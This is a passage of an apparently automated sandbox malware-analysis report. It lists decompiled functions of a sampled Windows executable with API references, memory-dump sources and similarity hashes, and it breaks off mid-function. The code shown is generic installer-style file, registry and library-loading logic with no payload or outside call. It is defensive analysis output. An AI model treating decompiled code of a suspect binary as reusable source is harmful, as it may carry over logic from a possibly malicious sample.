                                                            0x004013f4
                                                            0x004013c9
                                                            0x00000000

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.1283301112.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.1283280375.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283325225.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000410000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000414000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000041E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000042A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000438000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000045B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000047D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000047F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.00000000004BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.00000000004F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283508181.00000000004F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID:
                                                            • API String ID: 3850602802-0
                                                            • Opcode ID: 8ffdd9807c9e9fea2b97bbb89bab772424fd2da09bf17e16083ab72da1b50c14
                                                            • Instruction ID: 797ac5eab5bd55ce3963157cabd24902f5215075ef1b0f0e1f2fe658c051a2dc
                                                            • Opcode Fuzzy Hash: 8ffdd9807c9e9fea2b97bbb89bab772424fd2da09bf17e16083ab72da1b50c14
                                                            • Instruction Fuzzy Hash: 0A01D1316242209BE7094B399D08B2A3798F711318F10823FB851F61F1D678CC129B4C
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00402429 Relevance: 3.0, APIs: 2, Instructions: 39registryCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E00402429(void* __ebx, void* __edx) {
				long _t6;
				void* _t13;
				long _t18;
				void* _t20;
				void* _t22;
				void* _t23;

				_t13 = __ebx;
				_t26 =  *(_t23 - 0x18) - __ebx;
				_t20 = __edx;
				if( *(_t23 - 0x18) != __ebx) {
					_t6 = E00402CF7(_t20, E00402C39(0x22),  *(_t23 - 0x18) >> 1); // executed
					_t18 = _t6;
					goto L4;
				} else {
					_t22 = E00402C79(_t26, 2);
					if(_t22 == __ebx) {
						L6:
						 *((intOrPtr*)(_t23 - 4)) = 1;
					} else {
						_t18 = RegDeleteValueA(_t22, E00402C39(0x33));
						RegCloseKey(_t22);
						L4:
						if(_t18 != _t13) {
							goto L6;
						}
					}
				}
				 *0x4524a8 =  *0x4524a8 +  *((intOrPtr*)(_t23 - 4));
				return 0;
			}









                                                            0x00402429
                                                            0x00402429
                                                            0x0040242c
                                                            0x0040242e
                                                            0x0040246a
                                                            0x0040246f
                                                            0x00000000
                                                            0x00402430
                                                            0x00402437
                                                            0x0040243b
                                                            0x004027c8
                                                            0x004027c8
                                                            0x00402441
                                                            0x00402451
                                                            0x00402453
                                                            0x00402471
                                                            0x00402473
                                                            0x00000000
                                                            0x00402479
                                                            0x00402473
                                                            0x0040243b
                                                            0x00402ac8
                                                            0x00402ad4

                                                            APIs
                                                            • RegDeleteValueA.ADVAPI32(00000000,00000000), ref: 0040244A
                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00402453
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.1283301112.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.1283280375.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283325225.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000410000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000414000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000041E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000042A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000438000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000045B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000047D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000047F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.00000000004BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.00000000004F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283508181.00000000004F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: CloseDeleteValue
                                                            • String ID:
                                                            • API String ID: 2831762973-0
                                                            • Opcode ID: 89f34967f54b2aac586cece147ae45f43d1fae16bd496501fa127636accbe786
                                                            • Instruction ID: 34235f3b1f430fbf497285b3b61430caa7c9be3a8a673b0b08f99ec2f467b38a
                                                            • Opcode Fuzzy Hash: 89f34967f54b2aac586cece147ae45f43d1fae16bd496501fa127636accbe786
                                                            • Instruction Fuzzy Hash: 4FF0F632A04120ABE710ABB49B8E9AE62A89B40314F25043FF202B31C1DAF84D41966E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0040544A Relevance: 3.0, APIs: 2, Instructions: 32comCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 50%
                                                            			E0040544A(signed int __eax) {
				intOrPtr _v0;
				intOrPtr _t10;
				intOrPtr _t11;
				intOrPtr* _t12;

				_t11 =  *0x452448;
				_t10 =  *0x45244c;
				__imp__OleInitialize(0); // executed
				 *0x4524e0 =  *0x4524e0 | __eax;
				E00404320(0);
				if(_t10 != 0) {
					_t12 = _t11 + 0xc;
					while(1) {
						_t10 = _t10 - 1;
						if(( *(_t12 - 4) & 0x00000001) != 0 && E00401389( *_t12, _v0) != 0) {
							break;
						}
						_t12 = _t12 + 0x2018;
						if(_t10 != 0) {
							continue;
						} else {
						}
						goto L7;
					}
					 *0x4524ac =  *0x4524ac + 1;
				}
				L7:
				E00404320(0x404);
				__imp__OleUninitialize();
				return  *0x4524ac;
			}







                                                            0x0040544b
                                                            0x00405452
                                                            0x0040545a
                                                            0x00405460
                                                            0x00405468
                                                            0x0040546f
                                                            0x00405471
                                                            0x00405474
                                                            0x00405474
                                                            0x00405479
                                                            0x00000000
                                                            0x00000000
                                                            0x0040548a
                                                            0x00405492
                                                            0x00000000
                                                            0x00000000
                                                            0x00405494
                                                            0x00000000
                                                            0x00405492
                                                            0x00405496
                                                            0x00405496
                                                            0x0040549c
                                                            0x004054a1
                                                            0x004054a6
                                                            0x004054b3

                                                            APIs
                                                            • OleInitialize.OLE32(00000000), ref: 0040545A
                                                              • Part of subcall function 00404320: SendMessageA.USER32 ref: 00404332
                                                            • OleUninitialize.OLE32 ref: 004054A6
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.1283301112.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.1283280375.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283325225.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000410000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000414000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000041E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000042A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000438000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000045B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000047D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000047F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.00000000004BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.00000000004F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283508181.00000000004F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: InitializeMessageSendUninitialize
                                                            • String ID:
                                                            • API String ID: 2896919175-0
                                                            • Opcode ID: 26a39bb3d1c59b8153bbe96717fa75530bfd0ef50f002ce5e2fc391db5d8019d
                                                            • Instruction ID: 605ee913eaad74fb131c45803b2287184ab1d6587fbed753920360c824042bb4
                                                            • Opcode Fuzzy Hash: 26a39bb3d1c59b8153bbe96717fa75530bfd0ef50f002ce5e2fc391db5d8019d
                                                            • Instruction Fuzzy Hash: 43F0F073500B00ABE6409704EE01BAA7360EB82317F09403BEE44722A2D7B588458A5D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00401A1E Relevance: 3.0, APIs: 2, Instructions: 30stringCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E00401A1E(char __ebx) {
				CHAR* _t7;
				long _t8;
				char _t12;
				CHAR* _t17;
				void* _t19;

				_t12 = __ebx;
				_t7 = E00402C39(1);
				 *(_t19 + 8) = _t7;
				_t8 = ExpandEnvironmentStringsA(_t7, _t17, 0x2000); // executed
				if(_t8 == 0 ||  *((intOrPtr*)(_t19 - 0x20)) != __ebx && lstrcmpA( *(_t19 + 8), _t17) == 0) {
					 *((intOrPtr*)(_t19 - 4)) = 1;
					 *_t17 = _t12;
				}
				_t17[0x1fff] = _t12;
				 *0x4524a8 =  *0x4524a8 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}








                                                            0x00401a1e
                                                            0x00401a22
                                                            0x00401a2e
                                                            0x00401a31
                                                            0x00401a39
                                                            0x00401a4e
                                                            0x00401a51
                                                            0x00401a51
                                                            0x00401a53
                                                            0x00402ac8
                                                            0x00402ad4

                                                            APIs
                                                            • ExpandEnvironmentStringsA.KERNELBASE(00000000,?,00002000,00000001), ref: 00401A31
                                                            • lstrcmpA.KERNEL32(?,?,?,00002000,00000001), ref: 00401A44
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.1283301112.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.1283280375.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283325225.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000410000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000414000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000041E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000042A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000438000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000045B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000047D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000047F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.00000000004BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.00000000004F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283508181.00000000004F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: EnvironmentExpandStringslstrcmp
                                                            • String ID:
                                                            • API String ID: 1938659011-0
                                                            • Opcode ID: 4ff85bcb3c9e7bd11aa9790aa2296d6940b0516171ff6c32d0b182c22be1f72c
                                                            • Instruction ID: 0c80c25ae6124d08632ca9112a85281756203997caa87babcc69875add3a12a2
                                                            • Opcode Fuzzy Hash: 4ff85bcb3c9e7bd11aa9790aa2296d6940b0516171ff6c32d0b182c22be1f72c
                                                            • Instruction Fuzzy Hash: E1F08231705201EBDB20DF769D48A9FBFA5EF92350710843FE145F6191D7788501CA68
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00401EC5 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ShowWindow.USER32(00000000,00000000), ref: 00401EE3
                                                            • EnableWindow.USER32(00000000,00000000), ref: 00401EEE
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.1283301112.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.1283280375.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283325225.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000410000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000414000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000041E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000042A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000438000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000045B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000047D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000047F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.00000000004BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.00000000004F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283508181.00000000004F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: Window$EnableShow
                                                            • String ID:
                                                            • API String ID: 1136574915-0
                                                            • Opcode ID: f9bc8f064641d470ec4c16ff3f6f2a01e2106a779a3e6cb67e237468840b0f57
                                                            • Instruction ID: 95492d4cb058fd8d3dfd6bdd8f68eb7ce1d8cbcbb3bb97f8bbdf30dd964bc089
                                                            • Opcode Fuzzy Hash: f9bc8f064641d470ec4c16ff3f6f2a01e2106a779a3e6cb67e237468840b0f57
                                                            • Instruction Fuzzy Hash: 12E01272A08200AFD714EBA5AA8956EB7B4EB81365B20443FF101F11D1DBB858408A69
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00406663 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E00406663(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x40a240);
				_t5 = GetModuleHandleA( *(_t10 + 0x40a240));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40a244));
				}
				_t5 = E004065F5(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}





                                                            0x0040666b
                                                            0x0040666e
                                                            0x00406675
                                                            0x0040667d
                                                            0x00406689
                                                            0x00000000
                                                            0x00406690
                                                            0x00406680
                                                            0x00406687
                                                            0x00000000
                                                            0x00406698
                                                            0x00000000

                                                            APIs
                                                            • GetModuleHandleA.KERNEL32(?,00000000,?,004034F5,0000000B), ref: 00406675
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00406690
                                                              • Part of subcall function 004065F5: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040660C
                                                              • Part of subcall function 004065F5: wsprintfA.USER32 ref: 00406645
                                                              • Part of subcall function 004065F5: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00406659
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.1283301112.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.1283280375.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283325225.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000410000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000414000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000041E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000042A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000438000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000045B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000047D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000047F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.00000000004BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.00000000004F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283508181.00000000004F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                            • String ID:
                                                            • API String ID: 2547128583-0
                                                            • Opcode ID: b12ffe7be00a10b97de861747ec59dbd41b3c1b34775c1b4ed269191f8b45ceb
                                                            • Instruction ID: 42df78af1693d05b1f4151e300c7058424afa75421c13d02aa0b0909378b53c4
                                                            • Opcode Fuzzy Hash: b12ffe7be00a10b97de861747ec59dbd41b3c1b34775c1b4ed269191f8b45ceb
                                                            • Instruction Fuzzy Hash: 7FE086326042106BD3105B755E0493B73AC9E997103020D3EF94AF2140D7399C32966D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00405DEA Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 68%
                                                            			E00405DEA(CHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesA(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}





                                                            0x00405dee
                                                            0x00405dfb
                                                            0x00405e10
                                                            0x00405e16

                                                            APIs
                                                            • GetFileAttributesA.KERNELBASE(00000003,00402F4C,00489000,80000000,00000003,?,?,004036FD,?,?,00000007,00000009,0000000B), ref: 00405DEE
                                                            • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405E10
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.1283301112.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.1283280375.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283325225.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000410000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000414000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000041E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000042A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000438000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000045B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000047D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000047F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.00000000004BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.00000000004F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283508181.00000000004F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: File$AttributesCreate
                                                            • String ID:
                                                            • API String ID: 415043291-0
                                                            • Opcode ID: 495096ec3bada98d59396949f3e5d8db788c55d9a14f95543a77051fd5c04aa8
                                                            • Instruction ID: ee59d6d0e1d409ab4f08bbdf592326cff3c7222ef74ae4255e7f212f1854b30f
                                                            • Opcode Fuzzy Hash: 495096ec3bada98d59396949f3e5d8db788c55d9a14f95543a77051fd5c04aa8
                                                            • Instruction Fuzzy Hash: F5D09E31654201AFEF0D8F20DE16F2E7AA2EB84B00F11952CB782941E1DA715819AB19
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004058BB Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E004058BB(CHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryA(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}




                                                            0x004058c1
                                                            0x004058c9
                                                            0x00000000
                                                            0x004058cf
                                                            0x00000000

                                                            APIs
                                                            • CreateDirectoryA.KERNELBASE(?,00000000,004033A6,00485000,00485000,00485000,00485000,00485000,00403690,?,00000007,00000009,0000000B), ref: 004058C1
                                                            • GetLastError.KERNEL32(?,00000007,00000009,0000000B), ref: 004058CF
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.1283301112.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.1283280375.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283325225.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000410000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000414000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000041E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000042A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000438000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000045B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000047D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000047F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.00000000004BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.00000000004F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283508181.00000000004F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: CreateDirectoryErrorLast
                                                            • String ID:
                                                            • API String ID: 1375471231-0
                                                            • Opcode ID: 16e4c654e9ce22ade12b11bcec0acffe1e0d8e5e5550dff24455bfee17a8caa2
                                                            • Instruction ID: 3fc85bafe69b7557593d5765bf5919c43deceba34b0c9ea4212deea00e127d8c
                                                            • Opcode Fuzzy Hash: 16e4c654e9ce22ade12b11bcec0acffe1e0d8e5e5550dff24455bfee17a8caa2
                                                            • Instruction Fuzzy Hash: 34C04C31214601EED6106B219E08B177BE5AB50741F25843E6646F00A0DE388469DA2D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004023A4 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E004023A4(int __eax, CHAR* __ebx) {
				CHAR* _t11;
				void* _t13;
				CHAR* _t14;
				void* _t18;
				int _t22;

				_t11 = __ebx;
				_t5 = __eax;
				_t14 = 0;
				if(__eax != __ebx) {
					__eax = E00402C39(__ebx);
				}
				if(_t13 != _t11) {
					_t14 = E00402C39(0x11);
				}
				if( *((intOrPtr*)(_t18 - 0x18)) != _t11) {
					_t11 = E00402C39(0x22);
				}
				_t5 = WritePrivateProfileStringA(0, _t14, _t11, E00402C39(0xffffffcd)); // executed
				_t22 = _t5;
				if(_t22 == 0) {
